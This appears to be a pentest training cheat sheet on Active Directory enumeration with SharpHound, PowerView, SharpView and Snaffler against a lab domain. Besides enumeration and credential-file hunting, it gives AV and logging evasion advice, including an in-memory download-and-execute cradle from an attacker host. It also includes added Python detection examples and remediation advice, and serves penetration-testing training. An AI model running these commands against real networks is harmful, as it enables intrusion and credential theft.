🛡️ Methodology Checklist
- SharpHound collection: .\SharpHound.exe -c All --zipfilename loot.zip
- PowerView — users: Get-DomainUser | select samaccountname,memberof
- PowerView — Kerberoastable: Get-DomainUser -SPN
- PowerView — ASREPRoastable: Get-DomainUser -PreauthNotRequired
- PowerView — admin count: Get-DomainGroup -AdminCount
- PowerView — computers: Get-DomainComputer -Unconstrained
- Snaffler for share secrets: .\Snaffler.exe -s -o snaffler.txt
- Import BloodHound data and identify attack paths
🎯 Operational Context
Use when: Operating from a Windows foothold with valid AD credentials — enumerate AD via PowerView, SharpHound, or built-in cmdlets.
Think Dumber First: Run SharpHound first — SharpHound.exe -c All --zipfilename loot.zip. Then transfer to attack box and load into BloodHound GUI. PowerView is for targeted queries after you know what to look for.
Skip when: AV/EDR is active and blocking PowerShell — switch to native LDAP queries via dsquery or net commands (living off the land).
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| Import-Module ActiveDirectory | Load the native AD PowerShell module |
| Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Find Kerberoastable users (SPN set) |
| Get-ADTrust -Filter * | Enumerate all domain trust relationships |
| Get-ADGroupMember -Identity "[GROUP]" | List members of an AD group |
| Get-DomainUser -Identity [USER] -Domain [DOMAIN] \| Select-Object name,samaccountname,description,memberof,pwdlastset,admincount,serviceprincipalname | PowerView — detailed user object |
| Get-DomainGroupMember -Identity "[GROUP]" -Recurse | PowerView — recursive group membership (finds nested privileges) |
| Get-DomainTrustMapping | PowerView — map all domain trusts |
| Test-AdminAccess -ComputerName [HOSTNAME] | PowerView — check if current user has local admin on a host |
| .\SharpView.exe Get-DomainUser -Identity [USER] | .NET port of PowerView — use when PS is monitored |
| .\SharpView.exe Get-DomainGroupMember -Identity "[GROUP]" -Recurse | SharpView recursive group membership |
| Snaffler.exe -s -d [DOMAIN] -o snaffler.log -v data | Hunt for sensitive files on all domain shares |
| .\SharpHound.exe -c All --zipfilename bh_output | Collect all BloodHound data from Windows |
🔬 Deep Dive & Workflow
Native AD Module (Blend In)
Using built-in cmdlets generates traffic indistinguishable from legitimate admin activity:
Import-Module ActiveDirectory
Get-ADDomain
# Kerberoastable accounts — immediate targets
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Trust relationships — pivot to other domains
Get-ADTrust -Filter *
# Group membership
Get-ADGroupMember -Identity "Domain Admins"
PowerView — Targeted Enumeration
Import-Module .\PowerView.ps1
# Full user object for a target
Get-DomainUser -Identity wley -Domain INLANEFREIGHT.LOCAL | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
# Recursive group membership — ALWAYS use -Recurse for high-value groups
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
# Trust mapping
Get-DomainTrustMapping
# Check local admin rights across hosts
Test-AdminAccess -ComputerName ACADEMY-EA-MS01
The recursive flag is mandatory — many DA members inherit rights through nested secondary groups. Without -Recurse, they are invisible.
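To make the nesting point concrete for an auditor, here is an added example (not PowerView code and not from the original page) that expands group membership over a constructed in-memory directory; the group and user names are hypothetical stand-ins, and the one-level and recursive functions mirror Get-DomainGroupMember with and without -Recurse:

```python
# Added example, not PowerView code: why a one-level group query hides privileged users.
# DIRECTORY is a constructed in-memory stand-in for AD group membership
# (group name -> direct members; names that are keys are groups, all others are users).
DIRECTORY = {
    "Domain Admins": ["Administrator", "Secondary Admins"],
    "Secondary Admins": ["Helpdesk Level 1", "wley"],
    "Helpdesk Level 1": ["Helpdesk Level 2"],
    "Helpdesk Level 2": ["jsmith", "Helpdesk Level 1"],  # circular nesting, tolerated below
    "Backup Operators": ["bbackup"],
}


def direct_members(group):
    """What Get-DomainGroupMember returns without -Recurse: one level, groups included."""
    return list(DIRECTORY.get(group, []))


def effective_members(group):
    """What -Recurse yields: every user reachable through nested groups, cycle-safe."""
    seen_groups, users, stack = set(), set(), [group]
    while stack:
        current = stack.pop()
        if current in seen_groups:
            continue  # already expanded; this breaks the Helpdesk Level 1 <-> 2 cycle
        seen_groups.add(current)
        for member in DIRECTORY.get(current, []):
            if member in DIRECTORY:
                stack.append(member)  # nested group: expand it too
            else:
                users.add(member)
    return sorted(users)


def hidden_privileged_users(group):
    """Users who hold the group's rights through nesting but never appear in a one-level query."""
    return sorted(set(effective_members(group)) - set(direct_members(group)))


if __name__ == "__main__":
    print("direct:   ", direct_members("Domain Admins"))
    print("effective:", effective_members("Domain Admins"))
    print("hidden:   ", hidden_privileged_users("Domain Admins"))
```

Running it shows wley and jsmith as effective Domain Admins although neither appears in the direct listing, which is exactly the gap a non-recursive query leaves.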
SharpView (.NET) — When PS Is Restricted
If PowerShell Script Block Logging or AMSI blocks PowerView:
.\SharpView.exe Get-DomainUser -Identity wley
.\SharpView.exe Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Executes identical methods via native .NET — bypasses many PS-level detection rules.
Snaffler — Share Pillaging
Automatically discovers sensitive files (.kdb, .key, .sqldump, credential files) across all accessible domain shares:
Snaffler.exe -s -d INLANEFREIGHT.LOCAL -o snaffler.log -v data
- -v data restricts console output to actionable findings (default output is overwhelming)
- -o saves full raw output to a log file
- Targets file extensions and content patterns associated with credentials
SharpHound — BloodHound Collection
.\SharpHound.exe -c All --zipfilename ACADEMY_BLOU.zip
Collects: object properties, ACLs, sessions, local group memberships, domain trusts, GPOs.
Upload zip to BloodHound GUI. Key built-in queries:
- Find Shortest Paths to Domain Admins
- Find All Domain Admins
- Computers with Unsupported Operating Systems → verify these hosts actually respond before acting on them (stale objects persist in AD)
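The Reporting Trigger at the end of this page recommends alerting on bulk LDAP query patterns from workstations. As an added illustration (not part of the original page, and the filters are a constructed simplification rather than SharpHound's real query text), this Python script runs a burst detector over constructed DC-side LDAP log lines in a hypothetical format: a single client issuing subtree searches across several object classes within a minute is flagged, while a service account looking up its own object is not.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed DC-side LDAP search log (hypothetical format, not any product's real output).
# Filters are a simplification of what a broad collector issues, not SharpHound's actual queries.
LOG = """\
2024-05-01T10:00:01 client=10.10.14.5 user=wley scope=subtree filter=(objectClass=user)
2024-05-01T10:00:02 client=10.10.14.5 user=wley scope=subtree filter=(objectClass=group)
2024-05-01T10:00:02 client=10.10.14.5 user=wley scope=subtree filter=(objectClass=computer)
2024-05-01T10:00:03 client=10.10.14.5 user=wley scope=subtree filter=(objectClass=trustedDomain)
2024-05-01T10:00:04 client=10.10.14.5 user=wley scope=subtree filter=(objectClass=groupPolicyContainer)
2024-05-01T10:05:00 client=10.10.20.8 user=svc_sql scope=subtree filter=(sAMAccountName=svc_sql)
2024-05-01T10:30:00 client=10.10.20.9 user=jsmith scope=subtree filter=(objectClass=user)
"""

LINE = re.compile(r"^(?P<ts>\S+) client=(?P<client>\S+) user=(?P<user>\S+) "
                  r"scope=(?P<scope>\S+) filter=(?P<filter>.+)$")
# Object classes a full collection walks (the page lists properties, ACLs, trusts, GPOs).
ENUM_CLASSES = {"user", "group", "computer", "trustedDomain", "groupPolicyContainer"}


def parse(log):
    """Turn log text into dicts with a datetime timestamp; malformed lines are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.fromisoformat(e["ts"])
            events.append(e)
    return events


def bulk_enumeration_alerts(events, window=timedelta(seconds=60), min_classes=4):
    """Flag a client that subtree-searches >= min_classes distinct object classes within window."""
    by_client = defaultdict(list)
    for e in events:
        oc = re.search(r"objectClass=(\w+)", e["filter"])
        if e["scope"] == "subtree" and oc and oc.group(1) in ENUM_CLASSES:
            by_client[e["client"]].append((e["ts"], oc.group(1), e["user"]))
    alerts = []
    for client, hits in by_client.items():
        hits.sort()  # sliding window over time-ordered hits
        for i, (start, _, user) in enumerate(hits):
            classes = {c for t, c, _ in hits[i:] if t - start <= window}
            if len(classes) >= min_classes:
                alerts.append({"client": client, "user": user, "classes": sorted(classes)})
                break  # one alert per client is enough
    return alerts
```

Tune window and min_classes against a baseline of what your own management hosts issue, otherwise legitimate admin tooling and monitoring agents will trip the same rule.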
Kerberoastable SPN Discovery
Look for ServicePrincipalName when running Get-ADUser or PowerView — these accounts are immediate Kerberoast targets.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| SharpHound.exe detected by AV | Default signature match | Use in-memory: IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/SharpHound.ps1'); Invoke-BloodHound -c All |
| PowerView Import-Module fails | Execution policy blocks | Set-ExecutionPolicy Bypass -Scope Process -Force or load via IEX |
| BloodHound shows no data after import | Wrong collection method | Collect with -c All not default; ensure DNS resolves domain controllers by hostname |
| PowerView Get-DomainUser returns nothing | No AD module | Confirm domain join: (Get-WmiObject Win32_ComputerSystem).PartOfDomain; reconnect VPN if lab |
| SharpHound zip import fails in BloodHound | Neo4j version mismatch | Update BloodHound CE or use BloodHound Legacy with matching SharpHound version |
📝 Reporting Trigger
Finding Title: Active Directory Attack Path Mapped via SharpHound Collection
Impact: Complete BloodHound dataset reveals shortest privilege escalation paths to Domain Admin, including Kerberoastable accounts, ACL abuse chains, and unconstrained delegation targets.
Root Cause: Standard user accounts have excessive AD enumeration rights. No monitoring on SharpHound-style LDAP query patterns.
Recommendation: Deploy Microsoft Defender for Identity. Alert on bulk LDAP queries from workstations. Review and restrict AD ACL permissions. Implement Tier 0/1/2 administrative model.